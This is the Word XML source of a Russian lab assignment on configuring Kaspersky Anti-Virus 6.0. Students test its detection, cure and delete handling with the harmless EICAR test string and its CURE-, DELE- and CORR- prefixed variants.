            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="136B67C5" w14:textId="438E6E9B" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D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  <w:tr w:rsidR="00AE0348" w:rsidRPr="00E81933" w14:paraId="794FED52" w14:textId="77777777" w:rsidTr="00AE0348">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1066C682" w14:textId="0817F0FD" w:rsidR="00AE0348" w:rsidRDefault="00AE0348" w:rsidP="00AE03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938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51DA349B" w14:textId="63CE882A" w:rsidR="00AE0348" w:rsidRPr="00DD446A" w:rsidRDefault="00141712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712">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Comodo AntiVirus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2262" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B20EDCF" w14:textId="1458BAB0" w:rsidR="00AE0348" w:rsidRPr="0003031D" w:rsidRDefault="0003031D" w:rsidP="00AE0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Test_01_1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.txt Test_0</w:t>
            </w:r>
            <w:r w:rsidR="003D6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3031D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>. doc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="042859FD" w14:textId="2AD9C4D4" w:rsidR="00E81933" w:rsidRDefault="00E81933" w:rsidP="00E819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0BAF3" w14:textId="3CF0F67C" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="00E819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3A167" w14:textId="56B143BF" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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0C5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3D0C5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5E43B998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C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«Защита от разрушающих программных воздействий. Использование антивирусных средств»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6733D981" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2C092C" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7368B89E" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Целью выполнения лабораторной работы является изучение принципов работы антивирусных средств и их использования для зашиты от вредоносных программных воздействий</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Работа выполняется с помощью программы «Антивирус Касперского 6.0».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137F8B39" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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0CCD12" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr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C54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14:paraId="4923EA54" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Вариант задания выдается преподавателем и определяется файлом с тестовым вирусом. Необходимо ознакомится с интерфейсом пользователя, с основными параметрами настройки программы и настроить ее так, чтобы она обнаруживала тестовый вирус.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E17A9A" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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2291081" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr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>Изучение интерфейса пользователя</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B054D" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Интерфейс </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского 6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> состоит из четырех окон: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B71CAF" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Главного окна</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, в котором можно управлять задачами и компонентами антивируса. В нем также расположены ссылки на остальные окна</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD44AE1" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна настроек</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, предназначенного для настройки задач и компонентов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A496364" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна статистики и отчетов</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, в котором можно получить данные о результатах работы антивируса </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C76E25F" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0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b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Окна справочной системы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D737B3" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительно, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивирус Касперского</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> встраивается в контекстное меню объектов, размещенных на жестком диске, добавляет свою группу в системное меню </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Пуск</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и во время работы в системной панели операционной системы появляется иконка антивируса. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668071B1" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для ознакомления с интерфейсом пользователя нужно будет поочередно вызвать все четыре окна интерфейса </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Антивируса Касперского 6.0</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68967ED2" w14:textId="74ECF2AF" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:pStyle w:val="a8"/>
        <w:ind w:firstLine="540"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AFC1867" wp14:editId="225368EC">
            <wp:extent cx="4572000" cy="3396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313A" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Рис. 1. Главное окно программы «Антивирус Касперского 6.0»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D497056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Антивирус Касперского 6.0 включает в себя три основные подсистемы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15676D3C" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Антивирусный монитор: программа, следящая за обращением процессов к файлам и проверяющая процессы и файлы на предмет наличия вирусов. Антивирусный монитор работает постоянно в фоновом режиме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD6500B" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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>Антивирусный сканер: программа, которая может быть запущенная вручную пользователем или по определенному расписанию. Выполняет проверку различных ресурсов, таких как жесткие диски, съемные диски, сетевые диски, отдельные папки в файловой системе, оперативную память, объекты автозапуска на предмет наличия вирусов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C98725" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Сервисная подсистема: выполняет функции обновления базы вирусных  сигнатур, создания аварийного диска, ведения отчетов о работе антивирусной защиты, резервного хранения объектов, хранения объектов, помещенных на карантин.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952656A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97E94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В терминах интерфейса пользователя эти функции располагаются в трех категориях:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C49E356" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Защита</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A31F7A" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Поиск вирусов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB5EDD" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C5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Сервис</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5373326E" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C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628067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В верхней правой части окна размещено две ссылки: </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Справка</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Первая используется для настройки антивируса, вторая - для вывода справочной системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE4AC1C" w14:textId="2351A379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0FB6A" wp14:editId="0AD187C1">
            <wp:extent cx="3983990" cy="3265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8CF6" w14:textId="77777777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B6439" w14:textId="77777777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Рис. 2. Окно настроек программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450DB03" w14:textId="77777777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CEEE91D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 xml:space="preserve">Антивирусный монитор обеспечивает защиту в режиме реального времени, т. е. постоянно проверяет файлы, которым происходит обращение. В терминах «Антивируса Касперского 6.0» такая функциональность носит название «защита» и делится на защиту файловой системы, проверку электронной почты (протоколы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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">,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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3,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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), веб-антивирус (проверка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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> трафика), проактивную защиту (противостояние неизвестным вирусам, контроль запуска программ, обращений к реестру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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5471F472" w14:textId="606B7CE0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9DCBC" wp14:editId="4515625E">
            <wp:extent cx="4180205" cy="3461385"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="10" name="Рисунок 10" descr="Файловый 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йловый А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9D5F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29104D3" w14:textId="77777777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Рисунок 3. Окно настроек файлового антивируса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072FF25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6B32F3F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Антивирусный сканер (в терминах «Антивируса Касперского 6.0» - поиск вирусов) выполняет сканирование ресурсов компьютера в целях поиска вирусов. Сканирование может быть запущено пользователем вручную или по заранее установленному расписанию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232840A8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A452C6B" w14:textId="7CE00D72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960038" wp14:editId="62CA104C">
            <wp:extent cx="4375785" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="9" name="Рисунок 9" descr="Поиск вирусов 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иск вирусов А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F856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7D4D190" w14:textId="77777777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Рис. 4. Окно настроек поиска вирусов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A783E62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1FDEA80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В узле «Сервис» располагаются средства настройки обновления антивирусных баз, ведения файлов отчетов, параметров уведомлений, настройки сети и внешнего вида программы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A137B" w14:textId="41742A1F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36225" wp14:editId="44A9CEED">
            <wp:extent cx="4375785" cy="3526790"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="8" name="Рисунок 8" descr="Сервис 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ервис А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2D81" w14:textId="77777777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>Рис. 5. Окно настроек сервисных функций</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48605CD8" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54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Тестирование антивирусной функциональности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D6A00A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663BE" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C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1.2.1 Использование тестового вируса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</w:p>
    <w:p w14:paraId="14ED4E23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B4D95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Тестовый вирус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 xml:space="preserve">EICAR </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(European Institute for Computer Antivirus Research) разработан Европейским институтом компьютерных антивирусных исследований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C4829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 xml:space="preserve"> – это небольшой 68 байтный файл, который при запуске на незащищенном компьютере вызывает показ уведомления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 xml:space="preserve">"EICAR-STANDARD-ANTIVIRUS-TEST-FILE!". </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Иных, свойственных вирусам проявлений он не несет. Однако если на компьютере стоит и исправно работает антивирус,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 xml:space="preserve"> будет заблокирован. Это происходит потому, что все ведущие производители антивирусных программ договорились между собой - считать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 xml:space="preserve"> вирусом и применять к нему все правила и действия, применяемые к настоящим вредоносным программам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A930A0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Для создания антивируса необходимо открыть текстовый редактор и ввести следующую строку символов:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABB3AFA" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54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BD23BEC" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>%@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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[4\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PZX</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>54(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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>^)7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3D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)7}$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ANTIVIRUS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D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>!$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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>+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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B51A1ED" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54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14:paraId="65BDEF17" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:pStyle w:val="HTM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После этого следует сохранить файл с расширением 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</w:p>
    <w:p w14:paraId="428A3812" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C54">
      <w:pPr>
        <w:pStyle w:val="HTM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Для более подробного тестирования можно применять другие расширения. Например, если указать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>.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, можно проверить проверяются ли текстовые файлы. Для проверки будут ли обнаруживаться вирусы в архивах,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 xml:space="preserve"> можно заархивировать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B95E7E6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0EE48D5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1.2.2 Модификация тестового вируса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</w:p>
    <w:p w14:paraId="606CEAE5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D7C3306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Суть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 xml:space="preserve"> такова, что он оказывается неизлечимым. Это происходит потому, что антивирус идентифицирует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 xml:space="preserve"> как вирус по наличию в нем упомянутых 68 символов. Если их удалить - то от файла ничего не останется. Следовательно, с помощью </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rStyle w:val="texample"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28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 xml:space="preserve"> можно тестировать только основную функцию антивируса - обнаружение.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BE533C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08BE769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 xml:space="preserve">1.2.3 Создать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CURE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>. Файл создается в текстовом редакторе путем добавления в начало вируса символов “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CURE</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-” и сохранения файла с расширением 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Обнаружив такой файл антивирус «вылечит» его, сократив размер файла до 4 байт (символы «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CURE</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62396CFA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01697C0" w14:textId="21CB1DC8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924BE" wp14:editId="6FBC31B0">
            <wp:extent cx="5943600" cy="848995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="7" name="Рисунок 7" descr="CURE-E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E-EIC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6DEE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D2DFA62" w14:textId="77777777" w:rsidR="003D0C54" w:rsidRPr="003D0C54" w:rsidRDefault="003D0C54" w:rsidP="003D0C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Рис. 6. Модификация вируса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CURE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</w:p>
    <w:p w14:paraId="47EB60E9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BF1A649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1.2.4 Создать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DELE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>. Файл создается в текстовом редакторе путем добавления в начало вируса символов “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DELE</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-” и сохранения файла с расширением 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Обнаружив такой файл, антивирус определяет его как неизлечимый или троянскую программу и удаляет. По результатам проверки файл должен остаться только в резервном хранилище.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7084F79D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381C2B9C" w14:textId="42C86DAD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37E3E" wp14:editId="5425A219">
            <wp:extent cx="5943600" cy="848995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="6" name="Рисунок 6" descr="DELE-E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E-EIC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6F7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08CA9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Рис. 7. Модификация вируса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DELE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</w:p>
    <w:p w14:paraId="0100FB73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B2C44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1.2.5 Создать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CORR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>. Файл создается в текстовом редакторе путем добавления в начало вируса символов “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CORR</w:t>
      </w:r>
      <w:r w:rsidRPr="003D0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-” и сохранения файла с расширением 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0C54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Обнаружив такой файл, антивирус определяет его как файл с поврежденной структурой, вследствие чего проверить его на наличие вирусов невозможно. Такой файл признается условно чистым.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309DFD1B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3803AFF7" w14:textId="1399605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ED59C" wp14:editId="67005A69">
            <wp:extent cx="5943600" cy="848995"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="5" name="Рисунок 5" descr="CORR-E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R-EIC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6CF1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9F906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Рис. 8. Модификация вируса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CORR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</w:p>
